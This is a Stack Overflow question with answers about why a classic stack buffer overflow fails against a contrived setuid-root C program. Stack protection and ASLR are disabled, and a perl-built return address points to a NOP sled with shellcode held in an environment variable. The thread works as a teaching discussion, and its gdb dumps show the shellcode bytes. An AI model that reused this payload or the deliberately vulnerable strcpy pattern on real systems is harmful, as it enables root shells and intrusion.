# Executing shellcode stored in environment variable using buffer overflow

Tags: c, linux, segmentation-fault, buffer-overflow, exploit

I'm using the code below to try to execute some shellcode stored in an environment variable by overflowing the searchstring variable so that the return address of main contains the address of the anvironment variable. However, I get a segmentation fault before the printf command.

```
#include <stdio.h>
#include <string.h>

void main(int argc, char *argv[]){

    char searchstring[100];

    if(argc > 1)
        strcpy(searchstring, argv[1]);
    else // otherwise
        searchstring[0] = 0;

    printf("Here");

}
```

I compile the code using

```
gcc -m32 -g -o overflow.o overflow.c -fno-stack-protector -z execstack
```

in order to disable the stack protector and make the stack executable. I also disable ASLR by modifying /proc/sys/kernel/randomize_va_space to contain a 0. I also change the owner and group to root:

```
sudo chown root:root overflow.o
sudo chmod u+s overflow.o
```

The environment variable contains a NOP sled before the shellcode, and I determined that the address 0xffffd910 is in the middle of the NOP sled. Therefore I run the program using

```
./overflow.o $(perl -e 'print "\x10\xd9\xff\xff"x40')
```

but see a segmentation fault.

Using gdb I set a breakpoint on main and then stepped through the instructions. The seg fault occurs before the printf command is reached, and examining the stack pointer and instruction pointer immediately after the seg fault I see that

```
(gdb) x/32x $esp
0xffffd910:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd920:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd930:     0x90909090      0x90909090      0xdb31c031      0xb099c931
0xffffd940:     0x6a80cda4      0x6851580b      0x68732f2f      0x69622f68
0xffffd950:     0x51e3896e      0x8953e289      0x0080cde1      0x4d524554
0xffffd960:     0x6574783d      0x53006d72      0x4c4c4548      0x69622f3d
0xffffd970:     0x61622f6e      0x58006873      0x4d5f4d44      0x47414e41
0xffffd980:     0x6d3d4445      0x6f687465      0x6c633d64      0x69737361

(gdb) x/x $eip  
0x90909090:     Cannot access memory at address 0x90909090
```

Examining the stack frame of main (found earlier to be at address 0xffffd460) confirms that the address 0xffffd910 has indeed been copied into searchstring:

```
(gdb) x/32x 0xffffd460
0xffffd460:     0xffffd49f      0xffffd49e      0xffffd590      0xffffd910
0xffffd470:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd480:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd490:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4a0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4b0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4c0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
0xffffd4d0:     0xffffd910      0xffffd910      0xffffd910      0xffffd910
```

I don't understand why the stack pointer and instruction pointer jump to these locations even though main has not finished executing? Also, why does the instruction pointer jump to 0x90909090 rather than 0xffffd910? Is it this which is causing the segmentation fault, or is it some stack protection which i'm not aware of?

I realise that this is a contrived example, but I am just interested to know what is going on.

Thanks!

Answer (score 2, accepted):

After looking as the assembler code I have figured out what's happening. The last 3 lines of the code are

```
0x08048485 <+59>:    mov    ecx,DWORD PTR [ebp-0x4]
0x08048488 <+62>:    leave  
0x08048489 <+63>:    lea    esp,[ecx-0x4]
0x0804848c <+66>:    ret
```

Overflowing the searchstring variable causes the data at ebp-0x4 to be overwritten with an address midway through the NOP sled in the environment variable (0xffffd910). Therefore line 1 above leaves 0xffffd910 stored in ecx.

This means that in line 3 above, ecx-0x4 = 0xffffd910 - 0x4 = 0xffff90c, and this address is stored in esp. The data stored at this address is 0x90909090 (since we're still midway through the NOP sled). Finally, in the last line above, this data gets popped off the stack as the return address of main(), which is why we end up with eip=0x90909090, and the popping action means that esp gets moved back up to 0xffff90c + 0x4 = 0xffffd910.

My error all along was in assuming that the main() function behaves like any other with regards to return addresses. C has no notion of "return addresses" - these are implementation details - and using gcc-multilib 4.9.2-1 on my Arch Linux machine, this is how it is implemented.

Comment: I ran into the same problem. That "lea" instruction makes the eip register pointing at 0x90909090 instead of the nop sled address. Did you find any solution to this?

Answer (score 1):

Is so strange that esp points to your shellcode. Is print "\x10\xd9\xff\xff" the address of the enviroment variable?

It causes segfault because when RET is executed it do POP %eip, but your %esp points to 0x90909090, but of course you cannot access this address.

Comment: Yes "\x10\xd9\xff\xff" is the address of the enviroment variable. What causes esp to point to this?

Comment: in my opinion it has no sense. Could you try `perl -e 'print "A"x200'`? You should have segfault and see $eip = 0x61616161

Comment: No, I get a seg fault but $esp=0x4141413d (I have no idea where the 3d comes from). $eip stays as the address of the RET instruction since obviously $esp cannot be accessed.

Comment: It is so strange.. you can try to overwrite ESP with the address of the buffer, and in the buffer you put the address of enviroment variable: so the inject looks like something like that:
|address of env variable, address of env variable..| address of buffer|

Comment: Yes I could work around it, but I would still really like to know what is going on.

Comment: I'm not positive about this, but I asssume the strcpy ends up overwriting the return address pushed by main onto the stack to return back from the strcpy call.  That would explain why $eip has changed already.

Comment: I now understand what is happening and have posted it as an answer. Thanks for your help.